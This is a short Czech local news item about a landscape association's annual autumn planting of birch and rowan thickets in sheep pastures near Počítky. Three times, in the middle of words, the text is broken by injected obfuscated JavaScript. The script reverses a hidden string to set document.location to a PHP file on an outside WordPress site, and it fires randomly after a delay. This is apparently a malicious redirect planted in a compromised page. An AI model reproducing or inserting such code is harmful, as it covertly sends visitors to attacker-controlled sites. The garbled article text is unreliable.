výsadba rezmíků
Rainbow page separator

Sdružení Krajina vysází remízky na pastvinách

Pátek, 31. října 2014

Počítky / V sídle Sdružení Krajina v Počítkách odstartuje v sobotu 1. lis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topadu tradiční podzimní sázení stromů. Všichni zájemci se tam sejdou před 9. hodinou, poté je odchod k místům výsadeb za vsí. Zaparkovat je možné při hlavní silnici naproti obchodu.
Le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošní akce se opět týká výsadby remízků do pastvin. Ty budou tvořeny především břízami a jeřáby, aby na holých pláních vznikly úkryty pro pasoucí se ovce a zároveň došlo ke zpestření a rozčlenění „ploché“ krajiny. V místě už ros[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou stromořadí, která tam byla Sdružením Krajina vysazena dříve; nyní dojde k jejich doplnění a rozšíření.
Až budou stromy vysazeny, akce, které se každoročně účastní na čtyři desítky zájemců, bude pokračovat v sídle Sdružení Krajina v Počítkách. Uskuteční se tam kulturně-zábavný program pro účastníky všeho věku.